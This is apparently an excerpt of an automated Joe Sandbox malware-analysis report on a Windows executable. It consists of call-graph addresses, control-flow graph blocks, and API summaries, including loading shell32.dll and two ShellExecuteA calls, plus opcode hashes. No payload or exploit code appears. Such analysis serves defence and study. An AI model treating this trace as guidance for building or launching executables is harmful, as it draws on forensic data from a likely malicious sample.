API calls 19162->19163 19164 40d851 19163->19164 19165 40df74 ___std_exception_copy 41 API calls 19164->19165 19165->19159 19167 40c45a 19166->19167 19168 40c47c 19167->19168 19170 40c4a3 19167->19170 19174 40d52a 19173->19174 19186 40c2dd 19185->19186 19187 40c326 19186->19187 19188 40c2ff 19186->19188 19190 40be3c 15 API calls 19187->19190 19191 40c31c 19187->19191 19189 40def7 _Fputc 41 API calls 19188->19189 19189->19191 19190->19191 19191->19120 19193 40d39f 19192->19193 19203 40c446 42 API calls 19202->19203 19204 40d65a 19203->19204 19204->19120 19207 41608f 19205->19207 19206 4160d0 19213 416093 codecvt _Fputc 19206->19213 19214 4160bc codecvt 19206->19214 19207->19206 19208 40d730 _Fputc 41 API calls 19207->19208 19207->19213 19207->19214 19208->19206 19213->19120 19214->19213 19216 40d78b std::_Locinfo::_Locinfo_ctor 41 API calls 19215->19216 19217 40bf31 19216->19217 19218 40bf46 19217->19218 19221 40bf79 19217->19221 19224 40bf61 std::_Locinfo::_Locinfo_ctor 19217->19224 19219 40def7 _Fputc 41 API calls 19218->19219 19219->19224 19220 40c010 19222 40d6cc 41 API calls 19220->19222 19221->19220 19223 40d6cc 41 API calls 19221->19223 19222->19224 19223->19220 19224->19123 19226 40ed41 19225->19226 19230 40ed68 19225->19230 19226->19230 19230->19070 19233 404002 19232->19233 19302 404700 19233->19302 19235 40405c 19237 404b20 73 API calls 19235->19237 19241 404062 std::ios_base::_Ios_base_dtor 19235->19241 19237->19241 19238 404256 19239 401fff 19238->19239 19317 404a90 19238->19317 19242 404b20 19239->19242 19307 401f00 19241->19307 19425 405474 19242->19425 19245 405474 std::_Lockit::_Lockit 7 API calls 19246 404b6e 19245->19246 19250 4054cc std::_Lockit::~_Lockit 2 API calls 19246->19250 19247 404bb1 19431 4054cc 19247->19431 19249 404b92 19249->19247 19254 40742e std::_Facet_Register 16 API calls 19249->19254 19250->19249 19251 404bbd 19252 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19251->19252 19253 402020 19252->19253 19285 404890 19253->19285 19255 404c03 19254->19255 19256 405474 std::_Lockit::_Lockit 7 API calls 19255->19256 19257 404c2f 19256->19257 19258 404d98 19257->19258 19259 404c79 19257->19259 19476 40561e 19258->19476 19438 4058aa 19259->19438 19286 404700 43 API calls 19285->19286 19287 4048ce 19286->19287 19288 401f00 std::ios_base::_Init 43 API calls 19287->19288 19304 40471c 19302->19304 19303 404730 19303->19235 19304->19303 19305 404780 43 API calls 19304->19305 19306 40474f 19305->19306 19306->19235 19308 401f1a 19307->19308 19308->19238 19309 408090 CallUnexpected RaiseException 19308->19309 19310 401f32 std::ios_base::_Init 19308->19310 19309->19310 19321 401e50 19310->19321 19318 404af3 19317->19318 19319 404ace 19317->19319 19318->19239 19319->19318 19422 404a00 19319->19422 19322 401e90 19321->19322 19322->19322 19323 404390 std::ios_base::_Init 43 API calls 19322->19323 19324 401ea6 19323->19324 19346 4013b0 19324->19346 19327 401eb7 19347 4013f3 19346->19347 19348 401641 19347->19348 19352 401408 19347->19352 19399 4012d0 19348->19399 19350 401415 _Yarn 19356 401490 19350->19356 19384 404560 19350->19384 19351 401646 19353 40df84 std::ios_base::_Init 41 API calls 19351->19353 19352->19350 19370 404a40 19352->19370 19355 40164b 19353->19355 19357 40df84 std::ios_base::_Init 41 API calls 19355->19357 19362 404560 std::ios_base::_Init 43 API calls 19356->19362 19363 40150a _Yarn 19356->19363 19358 401650 19357->19358 19404 40804e 19358->19404 19362->19363 19363->19351 19364 401580 std::ios_base::_Ios_base_dtor 19363->19364 19365 407feb ___std_exception_copy 42 API calls 19364->19365 19366 4015dc 19365->19366 19366->19355 19367 40160d std::ios_base::_Ios_base_dtor 19366->19367 19368 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19367->19368 19369 40163b 19368->19369 19369->19327 19371 404a4b 19370->19371 19372 404a6d 19370->19372 19373 404a82 19371->19373 19374 404a52 19371->19374 19375 404a7d 19372->19375 19376 40742e std::_Facet_Register 16 API calls 19372->19376 19408 401250 19373->19408 19378 40742e std::_Facet_Register 16 API calls 19374->19378 19375->19350 19379 404a77 19376->19379 19380 404a58 19378->19380 19379->19350 19381 40df84 std::ios_base::_Init 41 API calls 19380->19381 19382 404a61 19380->19382 19383 404a8c 19381->19383 19382->19350 19385 4046b0 19384->19385 19386 404587 19384->19386 19387 4012d0 std::ios_base::_Init 43 API calls 19385->19387 19390 4045f6 19386->19390 19391 4045e9 19386->19391 19393 4045a0 19386->19393 19388 4046b5 19387->19388 19389 401250 std::ios_base::_Init 43 API calls 19388->19389 19397 4045b0 _Yarn 19389->19397 19394 40742e std::_Facet_Register 16 API calls 19390->19394 19390->19397 19391->19388 19391->19393 19392 40742e std::_Facet_Register 16 API calls 19392->19397 19393->19392 19394->19397 19395 40df84 std::ios_base::_Init 41 API calls 19396 4046bf 19395->19396 19397->19395 19398 404669 std::ios_base::_Ios_base_dtor _Yarn 19397->19398 19398->19356 19414 4055de 19399->19414 19405 408062 19404->19405 19406 40805b 19404->19406 19409 40125b std::_Facet_Register 19408->19409 19410 408090 CallUnexpected RaiseException 19409->19410 19411 40126a 19410->19411 19412 407feb ___std_exception_copy 42 API calls 19411->19412 19413 401291 19412->19413 19413->19380 19419 40551e 19414->19419 19417 408090 CallUnexpected RaiseException 19418 4055fd 19417->19418 19420 401150 std::invalid_argument::invalid_argument 42 API calls 19419->19420 19421 405530 19420->19421 19421->19417 19423 401f00 std::ios_base::_Init 43 API calls 19422->19423 19424 404a1f 19423->19424 19424->19318 19426 405483 19425->19426 19427 40548a 19425->19427 19481 40e125 19426->19481 19428 404b51 19427->19428 19486 406f3c EnterCriticalSection 19427->19486 19428->19245 19428->19249 19432 40e133 19431->19432 19433 4054d6 19431->19433 19536 40e10e LeaveCriticalSection 19432->19536 19435 4054e9 19433->19435 19535 406f4a LeaveCriticalSection 19433->19535 19435->19251 19436 40e13a 19436->19251 19537 40e3e0 19438->19537 19681 405592 19476->19681 19487 414874 19481->19487 19486->19428 19488 4141e3 std::_Locinfo::_Locinfo_ctor 5 API calls 19487->19488 19489 414879 19488->19489 19508 4141fd 19489->19508 19509 4143cc std::_Locinfo::_Locinfo_ctor 5 API calls 19508->19509 19510 414213 19509->19510 19511 414217 19510->19511 19512 4143cc std::_Locinfo::_Locinfo_ctor 5 API calls 19511->19512 19513 41422d 19512->19513 19514 414231 19513->19514 19515 4143cc std::_Locinfo::_Locinfo_ctor 5 API calls 19514->19515 19535->19435 19536->19436 19538 414874 std::_Locinfo::_Locinfo_ctor 5 API calls 19537->19538 19539 40e3ed 19538->19539 19548 40e18b 19539->19548 19549 40e197 __FrameHandler3::FrameUnwindToState 19548->19549 19684 401150 19681->19684 19685 407feb ___std_exception_copy 42 API calls 19684->19685 19686 401188 19685->19686 19687 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19686->19687 19896 41337b 19895->19896 19897 41338d ___scrt_uninitialize_crt 19895->19897 19898 413389 19896->19898 19900 40edf6 19896->19900 19897->18497 19898->18497 19903 40ec83 19900->19903 19906 40eb77 19903->19906 19907 40eb83 __FrameHandler3::FrameUnwindToState 19906->19907 19914 40e0c6 EnterCriticalSection 19907->19914 19909 40ebf9 19923 40ec17 19909->19923 19912 40eb8d ___scrt_uninitialize_crt 19912->19909 19915 40eaeb 19912->19915 19914->19912 19916 40eaf7 __FrameHandler3::FrameUnwindToState 19915->19916 19926 40bb65 EnterCriticalSection 19916->19926 19918 40eb01 ___scrt_uninitialize_crt 19919 40eb3a 19918->19919 19927 40ed91 19918->19927 19940 40eb6b 19919->19940 19972 40e10e LeaveCriticalSection 19923->19972 19925 40ec05 19925->19898 19926->19918 19928 40eda6 _Fputc 19927->19928 19929 40edb8 19928->19929 19930 40edad 19928->19930 19932 40ed28 ___scrt_uninitialize_crt 66 API calls 19929->19932 19931 40ec83 ___scrt_uninitialize_crt 70 API calls 19930->19931 19934 40edb3 19931->19934 19933 40edc2 19932->19933 19933->19934 19936 414bd2 _Ungetc 41 API calls 19933->19936 19935 40bbd5 _Fputc 41 API calls 19934->19935 19937 40edf0 19935->19937 19938 40edd9 19936->19938 19937->19919 19943 418203 19938->19943 19971 40bb79 LeaveCriticalSection 19940->19971 19942 40eb59 19942->19912 19944 418221 19943->19944 19945 418214 19943->19945 19947 41826a 19944->19947 19949 418248 19944->19949 19946 40e072 __dosmaperr 14 API calls 19945->19946 19953 418219 19946->19953 19948 40e072 __dosmaperr 14 API calls 19947->19948 19950 41826f 19948->19950 19954 418161 19949->19954 19952 40df74 ___std_exception_copy 41 API calls 19950->19952 19952->19953 19953->19934 19955 41816d __FrameHandler3::FrameUnwindToState 19954->19955 19967 41c9b3 EnterCriticalSection 19955->19967 19957 41817c 19959 41cc2f __wsopen_s 41 API calls 19957->19959 19966 4181c1 19957->19966 19958 40e072 __dosmaperr 14 API calls 19960 4181c8 19958->19960 19961 4181a8 FlushFileBuffers 19959->19961 19961->19960 19962 4181b4 GetLastError 19961->19962 19966->19958 19967->19957 19971->19942 19972->19925 22643 40679d 22644 4067ac 22643->22644 22646 4067d0 22644->22646 22647 40f516 22644->22647 22648 40f529 _Fputc 22647->22648 22653 40f44d 22648->22653 22650 40f53e 22651 40bbd5 _Fputc 41 API calls 22650->22651 22652 40f54b 22651->22652 22652->22646 22654 40f45f 22653->22654 22657 40f482 22653->22657 22655 40def7 _Fputc 41 API calls 22654->22655 22656 40f47a 22655->22656 22656->22650 22657->22654 22658 40f4a9 22657->22658 22661 40f352 22658->22661 22662 40f35e __FrameHandler3::FrameUnwindToState 22661->22662 22669 40bb65 EnterCriticalSection 22662->22669 22664 40f36c 22670 40f3ad 22664->22670 22666 40f379 22679 40f3a1 22666->22679 22669->22664 22671 40ed28 ___scrt_uninitialize_crt 66 API calls 22670->22671 22672 40f3c8 22671->22672 22673 4149a0 14 API calls 22672->22673 22674 40f3d2 22673->22674 22675 414094 __Getctype 14 API calls 22674->22675 22678 40f3ed 22674->22678 22676 40f411 22675->22676 22677 4140f1 ___free_lconv_mon 14 API calls 22676->22677 22677->22678 22678->22666 22682 40bb79 LeaveCriticalSection 22679->22682 22681 40f38a 22681->22650 22682->22681 19973 416faf 19974 414bd2 _Ungetc 41 API calls 19973->19974 19975 416fbc 19974->19975 19976 416fc8 19975->19976 19977 417014 19975->19977 19990 417345 19975->19990 19977->19976 19979 417076 19977->19979 19981 41639d 41 API calls 19977->19981 19998 41719f 19979->19998 19983 417069 19981->19983 19983->19979 19985 418105 19983->19985 19986 414094 __Getctype 14 API calls 19985->19986 19987 418122 19986->19987 19988 4140f1 ___free_lconv_mon 14 API calls 19987->19988 19989 41812c 19988->19989 19989->19979 19991 41735b 19990->19991 19992 41735f 19990->19992 19991->19977 19993 41cc2f __wsopen_s 41 API calls 19992->19993 19997 4173ae 19992->19997 19994 417380 19993->19994 19995 417388 SetFilePointerEx 19994->19995 19994->19997 19996 41739f GetFileSizeEx 19995->19996 19995->19997 19996->19997 19997->19977 19999 414bd2 _Ungetc 41 API calls 19998->19999 20000 4171ae 19999->20000 20001 4171c1 20000->20001 20002 417254 20000->20002 20004 4171de 20001->20004 20007 417205 20001->20007 20003 416ca7 __wsopen_s 66 API calls 20002->20003 20006 417087 20003->20006 20005 416ca7 __wsopen_s 66 API calls 20004->20005 20005->20006 20007->20006 20009 418a55 20007->20009 20010 418a69 _Fputc 20009->20010 20015 4188ac 20010->20015 20013 40bbd5 _Fputc 41 API calls 20014 418a8d 20013->20014 20014->20006 20016 4188b8 __FrameHandler3::FrameUnwindToState 20015->20016 20017 418996 20016->20017 20019 418914 20016->20019 20025 4188c0 20016->20025 20018 40def7 _Fputc 41 API calls 20017->20018 20018->20025 20026 41c9b3 EnterCriticalSection 20019->20026 20021 41891a 20022 41893f 20021->20022 20023 4189d2 __wsopen_s 43 API calls 20021->20023 20027 41898e 20022->20027 20023->20022 20025->20013 20026->20021 20030 41ca68 LeaveCriticalSection 20027->20030 20029 418994 20029->20025 20030->20029

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 69 4038c0-40398c call 40742e call 40745e LoadLibraryW call 402320 call 401fd0 * 2 81 403990-403995 69->81 81->81 82 403997-4039e0 call 404390 call 403730 call 4042a0 81->82 90 4039e2 82->90 91 4039e4-403abf call 4084c0 82->91 90->91 97 403ac1-403acc 91->97 98 403aec-403af3 91->98 99 403ae2-403ae9 call 40745e 97->99 100 403ace-403adc 97->100 101 403b22-403b3e 98->101 102 403af5-403b02 98->102 99->98 100->99 103 403b40-403b4d 101->103 104 403b6d-403bd4 call 40ba2a call 40dcfa call 40bd99 101->104 106 403b04-403b12 102->106 107 403b18-403b1f call 40745e 102->107 109 403b63-403b6a call 40745e 103->109 110 403b4f-403b5d 103->110 121 403bd7-403bdc 104->121 106->107 107->101 109->104 110->109 121->121 122 403bde-403c24 call 404390 call 403730 call 4042a0 121->122 130 403c26 122->130 131 403c28-403cef call 4084c0 122->131 130->131 137 403cf1-403cfc 131->137 138 403d1c-403d23 131->138 139 403d12-403d19 call 40745e 137->139 140 403cfe-403d0c 137->140 141 403d52-403d6e 138->141 142 403d25-403d32 138->142 139->138 140->139 146 403d70-403d7d 141->146 147 403d9d-403e38 call 40ba2a call 40dcfa call 40bd99 call 402320 ShellExecuteA * 2 141->147 144 403d34-403d42 142->144 145 403d48-403d4f call 40745e 142->145 144->145 145->141 151 403d93-403d9a call 40745e 146->151 152 403d7f-403d8d 146->152 163 403e67-403e8c 147->163 164 403e3a-403e47 147->164 151->147 152->151 167 403eba-403ecd call 407420 163->167 168 403e8e-403e9e 163->168 165 403e49-403e57 164->165 166 403e5d-403e64 call 40745e 164->166 165->166 166->163 169 403eb0-403eb7 call 40745e 168->169 170 403ea0-403eae 168->170 169->167 170->169
                                                              APIs
                                                              • LoadLibraryW.KERNELBASE(shell32.dll), ref: 0040390A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_KyC6hVwU8Z.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: .exe$open$shell32.dll
                                                              • API String ID: 1029625771-3690275032
                                                              • Opcode ID: d7bff8237f440146d83deb62151c971c0c1b597db8188bcc00e7c685d7fe324e
                                                              • Instruction ID: 418ef4dc6db39ef8a4e30a2a01dacbe7d681e2b7d77002ffff7f80637844b085
                                                              • Opcode Fuzzy Hash: d7bff8237f440146d83deb62151c971c0c1b597db8188bcc00e7c685d7fe324e
                                                              • Instruction Fuzzy Hash: 54E13A312083409BE718CF28CC45B6FBBE5BF85305F24462DF489AB2D2D779E6458B5A

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 422 41c196-41c1be call 41bcc6 425 41c1c4-41c1ca 422->425 426 41c386-41c387 call 41bd37 422->426 427 41c1cd-41c1d3 425->427 431 41c38c-41c38e 426->431 429 41c2d5-41c2f4 call 408a40 427->429 430 41c1d9-41c1e5 427->430 441 41c2f7-41c2fc 429->441 430->427 433 41c1e7-41c1ed 430->433 432 41c38f-41c39d call 407420 431->432 436 41c1f3-41c1ff IsValidCodePage 433->436 437 41c2cd-41c2d0 433->437 436->437 440 41c205-41c20c 436->440 437->432 442 41c234-41c241 GetCPInfo 440->442 443 41c20e-41c21a 440->443 444 41c339-41c343 441->444 445 41c2fe-41c303 441->445 450 41c2c1-41c2c7 442->450 451 41c243-41c262 call 408a40 442->451 448 41c21e-41c22a call 41bd9a 443->448 444->441 449 41c345-41c36f call 41bc88 444->449 446 41c305-41c30d 445->446 447 41c336 445->447 452 41c30f-41c312 446->452 453 41c32e-41c334 446->453 447->444 458 41c22f 448->458 462 41c370-41c37f 449->462 450->426 450->437 451->448 463 41c264-41c26b 451->463 457 41c314-41c31a 452->457 453->445 453->447 457->453 461 41c31c-41c32c 457->461 458->431 461->453 461->457 462->462 464 41c381 462->464 465 41c297-41c29a 463->465 466 41c26d-41c272 463->466 464->426 468 41c29f-41c2a6 465->468 466->465 467 41c274-41c27c 466->467 469 41c28f-41c295 467->469 470 41c27e-41c285 467->470 468->468 471 41c2a8-41c2bc call 41bc88 468->471 469->465 469->466 472 41c286-41c28d 470->472 471->448 472->469 472->472
                                                              APIs
                                                                • Part of subcall function 0041BCC6: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 0041BCF1
                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,0041BFDD,?,00000000,?,00000000,?), ref: 0041C1F7
                                                              • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041BFDD,?,00000000,?,00000000,?), ref: 0041C239
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_KyC6hVwU8Z.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CodeInfoPageValid
                                                              • String ID:
                                                              • API String ID: 546120528-0
                                                              • Opcode ID: 828569ccb8714ae48c68675b61d17cc33801355f1d7dcceba0b097672ed0b71e
                                                              • Instruction ID: 9d2c2a29c4c478eab1b1f1167368467c00d7c014d6dc0482c332f282e065d277
                                                              • Opcode Fuzzy Hash: 828569ccb8714ae48c68675b61d17cc33801355f1d7dcceba0b097672ed0b71e
                                                              • Instruction Fuzzy Hash: 4F512570E802448FDB24DFB6CC806EBBBE4EF91304F1485AFD09687251D7789982CB99

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 475 414a96-414a9b 476 414a9d-414ab5 475->476 477 414ac3-414acc 476->477 478 414ab7-414abb 476->478 480 414ade 477->480 481 414ace-414ad1 477->481 478->477 479 414abd-414ac1 478->479 482 414b38-414b3c 479->482 485 414ae0-414aed GetStdHandle 480->485 483 414ad3-414ad8 481->483 484 414ada-414adc 481->484 482->476 486 414b42-414b45 482->486 483->485 484->485 487 414b1a-414b2c 485->487 488 414aef-414af1 485->488 487->482 489 414b2e-414b31 487->489 488->487 490 414af3-414afc GetFileType 488->490 489->482 490->487 491 414afe-414b07 490->491 492 414b09-414b0d 491->492 493 414b0f-414b12 491->493 492->482 493->482 494 414b14-414b18 493->494 494->482
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00414AE2
                                                              • GetFileType.KERNELBASE(00000000), ref: 00414AF4
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_KyC6hVwU8Z.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileHandleType
                                                              • String ID:
                                                              • API String ID: 3000768030-0
                                                              • Opcode ID: 14da27bdb5d952759cc947a18c1f6313485b17a09da5127208cbfccaf6a1781a
                                                              • Instruction ID: 68df3f11dd2f645efc31e1e90aadc3e75d180b75955679e0b2236dab09e8ba97
                                                              • Opcode Fuzzy Hash: 14da27bdb5d952759cc947a18c1f6313485b17a09da5127208cbfccaf6a1781a
                                                              • Instruction Fuzzy Hash: 141175712087514AC7308E3E9C887637AD4ABD6370B39071BD1B6962F1C328E9C6965D
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,0000000C,?,?,004152D9,00000001,00000364,?,00000002,000000FF,?,?,0040E077,00415469), ref: 004140D5
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_KyC6hVwU8Z.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 14b8f9ac75b8980b6812ff089cde42dce8ba1f12a125e940596199f5ca44a4d3
                                                              • Instruction ID: 7a371578952800d697783e4f14dfa84f7cfeb60b6085e341501622e7ba028638
                                                              • Opcode Fuzzy Hash: 14b8f9ac75b8980b6812ff089cde42dce8ba1f12a125e940596199f5ca44a4d3
                                                              • Instruction Fuzzy Hash: E9F0BB35605625ABDB215A63DC05BDB3F489FC5760B158123B904EB1A0CA68D9D1819D
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_KyC6hVwU8Z.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
                                                              • Instruction ID: 28cfbda6749b70c9de2fbd9d245fef773b8951bf2dd70127050a9a6bf190398c
                                                              • Opcode Fuzzy Hash: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
                                                              • Instruction Fuzzy Hash: 05D06C3210010DFBDF128F84DC06EDA3FAAFB4C714F018010FA5856021C732E832AB94